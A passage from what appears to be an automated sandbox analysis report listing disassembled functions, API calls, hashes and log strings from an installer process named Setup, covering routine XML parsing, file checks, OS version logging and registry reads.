                                                                                                                                                                    • Opcode Fuzzy Hash: 42fbec0faa2823f05d125229b4dd1c21fb7b0abeab0b7b19e86a0cd4d79d373c
                                                                                                                                                                    • Instruction Fuzzy Hash: EC516D71900249EBDF10DBE8C945BAEB7F8BF09318F108168E515FB691DB75DA04CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7B00D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7B014
                                                                                                                                                                      • Part of subcall function 69DA91AF: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,69D7B029,?,0000002C,69DBD55B,?,?,?,?,00000001), ref: 69DA91C5
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D7B044
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7B128
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D7B163
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    Strings
                                                                                                                                                                    • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 69D7B1CB
                                                                                                                                                                    • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 69D7B033
                                                                                                                                                                    • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 69D7B0F6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeH_prolog3String$CreateException@8InstanceThrow
                                                                                                                                                                    • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                                                                                                    • API String ID: 1763430278-2525052916
                                                                                                                                                                    • Opcode ID: 3d3e2fd192ea70e1b3f89f6d6b4801dd974b49b914737ff8bc2ff9cd31dad0e6
                                                                                                                                                                    • Instruction ID: d0b40ab4914d47ee7368a1a797b9c5218d934d0831c281659c4188db22c67192
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3e2fd192ea70e1b3f89f6d6b4801dd974b49b914737ff8bc2ff9cd31dad0e6
                                                                                                                                                                    • Instruction Fuzzy Hash: E4518171800249EFDB10DFE8C884DEEBBB8BF15318F548579E551AB690DB349A48CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB2C16 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69D78168: GetFileSize.KERNEL32(?,?,?,?,?,69DA3B9F,?,?,00000000,?,?,?,?,00000008,69DAEC79,?), ref: 69D78178
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 69DB2CA8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DB2CE7
                                                                                                                                                                    • CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 69DB2D19
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 69DB2D32
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3$AttributesCopyException@8ExistsPathSizeThrow
                                                                                                                                                                    • String ID: Copy of Header File failed$DHTML Header File doesn't exist$DHTMLLogger
                                                                                                                                                                    • API String ID: 1055460099-1824744887
                                                                                                                                                                    • Opcode ID: 1ab906b28bec2ebb2bac53b09cb5a14deb622c94d22faf87313f5bebc6234bd9
                                                                                                                                                                    • Instruction ID: 712e992137435d5cafe9529ec570cf52075604b7d9d3d70434fb53228c78812f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1ab906b28bec2ebb2bac53b09cb5a14deb622c94d22faf87313f5bebc6234bd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 48513BB20083849FD710DFA4C880E5ABBE8BF99358F404A3DF1959BA94D734D6098B63
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA4E70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 141fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA4E77
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D75FCE: __EH_prolog3.LIBCMT ref: 69D75FD5
                                                                                                                                                                      • Part of subcall function 69D75FCE: PathIsRelativeW.SHLWAPI(?,?,?,?,?,ParameterInfo.xml,?,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69D76018
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DA4F68
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 69DA4F7E
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 69DA4FA1
                                                                                                                                                                      • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
                                                                                                                                                                      • Part of subcall function 69D7A3BC: __EH_prolog3.LIBCMT ref: 69D7A3C3
                                                                                                                                                                    Strings
                                                                                                                                                                    • File %s could not be opened for read, xrefs: 69DA4F0F
                                                                                                                                                                    • File %s is not UTF-16 with Byte Order Marks (BOM), xrefs: 69DA4FCC
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69DA4FE5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ChangeCloseDispatcherExceptionException@8FileFindNotificationPathReadRelativeThrowUser
                                                                                                                                                                    • String ID: File %s could not be opened for read$File %s is not UTF-16 with Byte Order Marks (BOM)$ParameterInfo.xml
                                                                                                                                                                    • API String ID: 2138378564-652212332
                                                                                                                                                                    • Opcode ID: 74a10a99fec4bb2450383291a1074b83f56150eb786e19217b8c11212d2334f0
                                                                                                                                                                    • Instruction ID: b50f395296ec9b51486ccbf61dede10ac19a330cdd54d9254cb9234fdb128b12
                                                                                                                                                                    • Opcode Fuzzy Hash: 74a10a99fec4bb2450383291a1074b83f56150eb786e19217b8c11212d2334f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 84512871800249EFDF11DFE8C984ADEBBB9AF05318F109175E115FB691DB309A188B72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D854B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D854B8
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D85540
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    Strings
                                                                                                                                                                    • W, xrefs: 69D85530
                                                                                                                                                                    • Schema validation failure in file , xrefs: 69D85575
                                                                                                                                                                    • Unable to find Language element for LangID="%d" in localized data, xrefs: 69D8551A
                                                                                                                                                                    • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 69D85599
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D85565
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                                                                                                                                    • API String ID: 2489616738-3464115581
                                                                                                                                                                    • Opcode ID: 244b39deccc6e474475b525dc7c520d103970d77e80c66af540f5658776cdba2
                                                                                                                                                                    • Instruction ID: 1cd5bde85a6d3d94126f8be8ba3fadc338f755e4e2b306855518f402bd9f9c71
                                                                                                                                                                    • Opcode Fuzzy Hash: 244b39deccc6e474475b525dc7c520d103970d77e80c66af540f5658776cdba2
                                                                                                                                                                    • Instruction Fuzzy Hash: A3416B75900249EFDF10DBE8C944BADBBB9AF19318F1481A8F015EB681DB35DA04CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA7F6A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DA7F74
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • _memset.LIBCMT ref: 69DA7FD4
                                                                                                                                                                    • GetVersionExW.KERNEL32 ref: 69DA7FED
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3H_prolog3_Version_memset
                                                                                                                                                                    • String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
                                                                                                                                                                    • API String ID: 3727276431-2914782974
                                                                                                                                                                    • Opcode ID: b8ab86ff4aa5a9fa6aba13312089bc8e22a465db9a430c0c430bff2a2a4d0431
                                                                                                                                                                    • Instruction ID: 3ed5273f37a8aafb609a33801801175d654bb7b7565f62d218632d1940669afe
                                                                                                                                                                    • Opcode Fuzzy Hash: b8ab86ff4aa5a9fa6aba13312089bc8e22a465db9a430c0c430bff2a2a4d0431
                                                                                                                                                                    • Instruction Fuzzy Hash: 98416A75900158DBCB21DBA8CD45FCDB7B8AF09308F4480E5E548EB691D770AB94CFA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D795C1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D795C8
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 69D795DB
                                                                                                                                                                    • VariantClear.OLEAUT32(00000008), ref: 69D7962E
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D7960E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 69D79651
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D796F8
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation error: attribute not found - , xrefs: 69D79676
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3StringVariant$AllocClearException@8FreeInitThrow
                                                                                                                                                                    • String ID: schema validation error: attribute not found -
                                                                                                                                                                    • API String ID: 8365360-3489740836
                                                                                                                                                                    • Opcode ID: 762356c8d771af560d8ae910f25608ba1566a593f65c42a39ab3262efc3a9312
                                                                                                                                                                    • Instruction ID: 5248c467332df934f8256ab58bedaf0fb40646e787af2d464f4f4386a0b2b2c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 762356c8d771af560d8ae910f25608ba1566a593f65c42a39ab3262efc3a9312
                                                                                                                                                                    • Instruction Fuzzy Hash: C0416D76800249EFCB00DFE4C984EDE7BB9BF05318F148669F521AB680CB349A44CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB374B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB3752
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69D7C259: __EH_prolog3.LIBCMT ref: 69D7C260
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,69DAFA6E,0000000C,69DB3A05,?,69D6A794,?), ref: 69DB37B7
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 69DB3846
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    Strings
                                                                                                                                                                    • LocalizedData.xml, xrefs: 69DB3835
                                                                                                                                                                    • SetupResources.dll missing from %d directory, xrefs: 69DB37BE
                                                                                                                                                                    • SetupResources.dll, xrefs: 69DB37A0
                                                                                                                                                                    • LocalizedData.xml missing from %d directory, xrefs: 69DB384D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FilePath$Exists$AppendModuleName
                                                                                                                                                                    • String ID: LocalizedData.xml$LocalizedData.xml missing from %d directory$SetupResources.dll$SetupResources.dll missing from %d directory
                                                                                                                                                                    • API String ID: 3590062302-1245617268
                                                                                                                                                                    • Opcode ID: e24bde761948246c585ef08177d53ee55897ad77089fbb698414ec3626b5bbea
                                                                                                                                                                    • Instruction ID: cff546011d54a28b7ed0f91033a485f67ac4c1ace474bad21ddc82b1c89e3b9f
                                                                                                                                                                    • Opcode Fuzzy Hash: e24bde761948246c585ef08177d53ee55897ad77089fbb698414ec3626b5bbea
                                                                                                                                                                    • Instruction Fuzzy Hash: 08316DB6800149EFDB10DBB8CC45EAE7BA8AF01328F549275E424AB795D731DA148B72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB101A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB1021
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7C406: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C426
                                                                                                                                                                      • Part of subcall function 69D7C406: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,69DB0F4A,00000004,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C43F
                                                                                                                                                                      • Part of subcall function 69D7C406: RegCloseKey.KERNEL32(?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02602230,00000004,69DB0F4A,?), ref: 69D7C44E
                                                                                                                                                                    • GetLastError.KERNEL32(?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,69DAA58E,?,69D6A794,?,02602230,?,00000000,?), ref: 69DB1092
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,Failed to record IsInternal,?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,69DAA58E,?,69D6A794,?), ref: 69DB10F0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3Last$CloseOpenQueryValue
                                                                                                                                                                    • String ID: Failed to record IsAdmin$Failed to record IsInternal$PerfLab$Software\Microsoft\DevDiv
                                                                                                                                                                    • API String ID: 716194244-1174128248
                                                                                                                                                                    • Opcode ID: 4db38332002e158122de8a4306e166909ab29b9a7adcf951ce85630423c96938
                                                                                                                                                                    • Instruction ID: 8116e00a21776e3cb92ab7338a3ee498fbd051df65045a53feba64d82ef000a9
                                                                                                                                                                    • Opcode Fuzzy Hash: 4db38332002e158122de8a4306e166909ab29b9a7adcf951ce85630423c96938
                                                                                                                                                                    • Instruction Fuzzy Hash: F83192B5A00245EFD710DBA4CE06AAE7BB9FF45354F508638E421EBA90C734DA05C671
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D776AC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D776B3
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000010,00000104), ref: 69D77711
                                                                                                                                                                    • GetFileVersionInfoSizeW.KERNELBASE(00000010,?), ref: 69D7772A
                                                                                                                                                                    • GetFileVersionInfoW.KERNELBASE(00000010,?,00000000,00000000), ref: 69D77745
                                                                                                                                                                    • VerQueryValueW.VERSION(00000000,69D5496C,?,?), ref: 69D7775D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$H_prolog3InfoVersion$ModuleNameQuerySizeValue
                                                                                                                                                                    • String ID: %d.%d.%d.%d$0.0.0.0
                                                                                                                                                                    • API String ID: 1538924429-464342551
                                                                                                                                                                    • Opcode ID: a324a1a852175807cc51702c5fe8e48e2df9b294a59755cca4360779de3cf809
                                                                                                                                                                    • Instruction ID: b2afb1f9f9aec7b933edaac1f8fa3b39ac62aa2606f92d51210f4b50c18d5dc2
                                                                                                                                                                    • Opcode Fuzzy Hash: a324a1a852175807cc51702c5fe8e48e2df9b294a59755cca4360779de3cf809
                                                                                                                                                                    • Instruction Fuzzy Hash: BF3149B5900219EBDB00DFA4CC84CBEBBB9FF45354B409539E811AB691DB349E16CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA7E78 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA7E7F
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8380: __EH_prolog3.LIBCMT ref: 69DA8387
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: AlwaysUploaded$Disabled$Unknown$User Experience Data Collection Policy$User Experience Data Collection Policy: %s$UserControlled
                                                                                                                                                                    • API String ID: 431132790-3357067047
                                                                                                                                                                    • Opcode ID: dc707f5c4d5aa9cd393f53f8a0e2cd94fbac394322e99f88c7c6e89643832226
                                                                                                                                                                    • Instruction ID: 142f93f0e08813397cb8393b75abb91a4991df05923652ab1e401761e8d83c5d
                                                                                                                                                                    • Opcode Fuzzy Hash: dc707f5c4d5aa9cd393f53f8a0e2cd94fbac394322e99f88c7c6e89643832226
                                                                                                                                                                    • Instruction Fuzzy Hash: D52189B1900149EBCB00DBE8C845EEEBBF9AF15308F508475E150E7B91D734AA19CBB2
                                                                                                                                                                    Uniqueness

